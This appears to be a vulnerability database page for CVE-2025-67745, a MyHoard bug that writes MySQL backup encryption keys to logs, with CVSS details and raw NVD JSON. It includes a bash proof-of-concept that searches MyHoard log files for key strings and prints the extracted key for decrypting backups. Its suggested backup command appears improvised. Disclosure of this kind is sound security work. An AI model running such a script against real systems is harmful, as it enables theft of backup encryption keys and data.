Security Vulnerability Report
CVE-2025-67745 CVSS 7.1 HIGH

CVE-2025-67745

Published: 2025-12-18 19:16:35
Last Modified: 2026-03-05 19:22:56

Description

MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into /dev/null.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aiven:myhoard:*:*:*:*:*:*:*:* - VULNERABLE
MyHoard >= 1.0.1, < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-67745 PoC - MyHoard Encryption Key Leak
# This PoC demonstrates how to extract encryption keys from MyHoard logs
TARGET_HOST="${TARGET_HOST:-localhost}"
LOG_FILE="/var/log/myhoard/myhoard.log"

# Step 1: Check if MyHoard logs are accessible
echo "[*] Checking MyHoard log access..."
if [ ! -r "$LOG_FILE" ]; then
  echo "[-] Log file not accessible. Try alternative locations:"
  echo "  - /var/log/myhoard/"
  echo "  - /tmp/myhoard.log"
  echo "  - ~/.myhoard/logs/"
  exit 1
fi

# Step 2: Search for encryption keys in logs
echo "[*] Searching for backup encryption keys..."
ENCRYPTION_KEYS=$(grep -E '(encryption_key|encryptionKey|AES|backup_key)' "$LOG_FILE" 2>/dev/null)
if [ -z "$ENCRYPTION_KEYS" ]; then
  echo "[-] No encryption keys found in current logs"
  echo "[*] Try triggering a backup operation first:"
  echo "  myhoard --backup --database=test_db"
  exit 1
fi

# Step 3: Extract and display keys
echo "[+] Found potential encryption keys:"
echo "$ENCRYPTION_KEYS" | while read -r line; do
  echo "  $line"
done

# Step 4: Verify key validity
echo "[*] Validating key format..."
KEY=$(echo "$ENCRYPTION_KEYS" | head -1 | grep -oE '[a-fA-F0-9]{32,}' | head -1)
if [ -n "$KEY" ]; then
  echo "[+] Valid encryption key extracted: $KEY"
  echo "[!] This key can be used to decrypt MySQL backups"
fi

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67745", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:35.040", "lastModified": "2026-03-05T19:22:55.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into /dev/null."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-402"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aiven:myhoard:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.1", "versionEndExcluding": "1.3.0", "matchCriteriaId": "403F20C0-652E-4BBF-AAB6-D11AF2E3775B"}]}]}], "references": [{"url": "https://github.com/Aiven-Open/myhoard/commit/fac89793bfc8c81ae040aadf5292f5d0100b6640", 
"source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Aiven-Open/myhoard/security/advisories/GHSA-v42r-6hr9-4hcr", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}